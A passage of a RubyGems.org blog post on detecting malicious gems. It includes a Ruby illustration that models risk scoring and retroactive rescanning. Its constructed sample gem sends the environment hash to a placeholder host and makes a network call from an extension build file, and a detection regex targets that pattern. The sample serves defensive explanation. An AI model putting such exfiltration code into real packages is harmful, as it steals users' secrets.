
How RubyGems.org protects OSS infrastructure


by Marty Haught

Recently, Socket.dev published research highlighting malicious gems designed to steal social media credentials. We wanted to use this as an opportunity to share more about how RubyGems.org security operates, how we proactively handled this incident (and others), and the work our team is doing each day to keep the ecosystem safe.

How We Detect Malicious Gems

RubyGems.org security uses a proactive and multi-layered approach:

1. Automated detection: Every gem upload is analyzed using both static and dynamic code analysis, including behavioral checks and metadata review. Much of this capability comes from Mend.io’s supply chain security tooling (originally built by our own Maciej Mensfeld, a maintainer on the RubyGems team).

2. Risk scoring: Each package is given a score. Higher-risk gems are escalated for manual review by a member of our security team.

3. Retroactive scanning: As detection techniques improve, older packages are automatically rescanned, which allows us to catch threats that may have slipped through in the past. (This is how we found the threat actor that Socket.dev later investigated.)

4. External sources: We sometimes receive alerts from vulnerability databases, industry partners, and cross-registry collaborations, which help us identify patterns across ecosystems.

Through steps 1 through 3, our team detects the majority (roughly 70-80%) of malicious packages before they are ever reported to us or the public.
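As an added illustration (not RubyGems.org's or Mend.io's code), the Ruby model below walks through steps 1 through 3: each upload is scored by a set of rules, anything at or above a threshold is escalated for manual review, and a retroactive rescan with a newer rule set reports only the gems whose verdict changed. The rule names, weights, threshold and sample gems are all constructed for this example.

```ruby
# Added illustration of the layered flow described in the post; NOT the scanner
# RubyGems.org or Mend.io actually run. Gems, rules and weights are constructed.
# A gem as the scanner sees it: metadata plus the text of each packaged file.
GemRecord = Struct.new(:name, :version, :metadata, :files, keyword_init: true)
# A detection rule: an id, a weight added to the score, and a predicate over a gem.
Rule = Struct.new(:id, :weight, :check, keyword_init: true)

# Rule set v1: one metadata-review check and one static-analysis check.
RULES_V1 = [
  Rule.new(id: :new_publisher, weight: 10,
           check: ->(g) { g.metadata[:publisher_age_days] < 7 }),
  Rule.new(id: :posts_environment, weight: 30,
           check: ->(g) { g.files.values.any? { |src| src.match?(/Net::HTTP.*ENV/) } })
].freeze

# Rule set v2 adds a check learned later: network code inside a native extension,
# which runs at install time. Retroactive scanning applies v2 to older uploads.
RULES_V2 = (RULES_V1 + [
  Rule.new(id: :network_in_extension, weight: 40,
           check: ->(g) { g.files.any? { |path, src| path.start_with?('ext/') && src.include?('Net::HTTP') } })
]).freeze

REVIEW_THRESHOLD = 50 # scores at or above this go to a human reviewer

# Score one gem against a rule set and decide whether to escalate it.
def triage(gem, rules)
  hits = rules.select { |r| r.check.call(gem) }
  score = hits.sum(&:weight)
  { score: score, hits: hits.map(&:id), action: score >= REVIEW_THRESHOLD ? :manual_review : :allow }
end

# Scan a batch of uploads; results are keyed by "name-version".
def scan_all(gems, rules)
  gems.to_h { |g| ["#{g.name}-#{g.version}", triage(g, rules)] }
end

# Retroactive scan: re-run a newer rule set and report only gems whose action changed.
def rescan(gems, rules, previous)
  scan_all(gems, rules).select { |key, res| res[:action] != previous.fetch(key)[:action] }
end

# Constructed sample uploads: one benign, one scoring 40 under v1 (allowed) but 80 under v2.
SAMPLE_GEMS = [
  GemRecord.new(name: 'tidy-logger', version: '1.0.0', metadata: { publisher_age_days: 900 },
                files: { 'lib/tidy_logger.rb' => "module TidyLogger; def self.log(m); puts(m); end; end\n" }),
  GemRecord.new(name: 'social-helper', version: '0.1.0', metadata: { publisher_age_days: 2 },
                files: { 'lib/social_helper.rb' => "Net::HTTP.post(URI('http://example.invalid/x'), ENV.to_h.to_s)\n",
                         'ext/extconf.rb' => "Net::HTTP.get(URI('http://example.invalid/y'))\n" })
].freeze
```

Running `scan_all(SAMPLE_GEMS, RULES_V1)` allows both gems; `rescan(SAMPLE_GEMS, RULES_V2, first_results)` then returns only `social-helper-0.1.0`, now escalated, which is the retroactive-scanning outcome the post describes.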

What Happens When We Flag a Gem
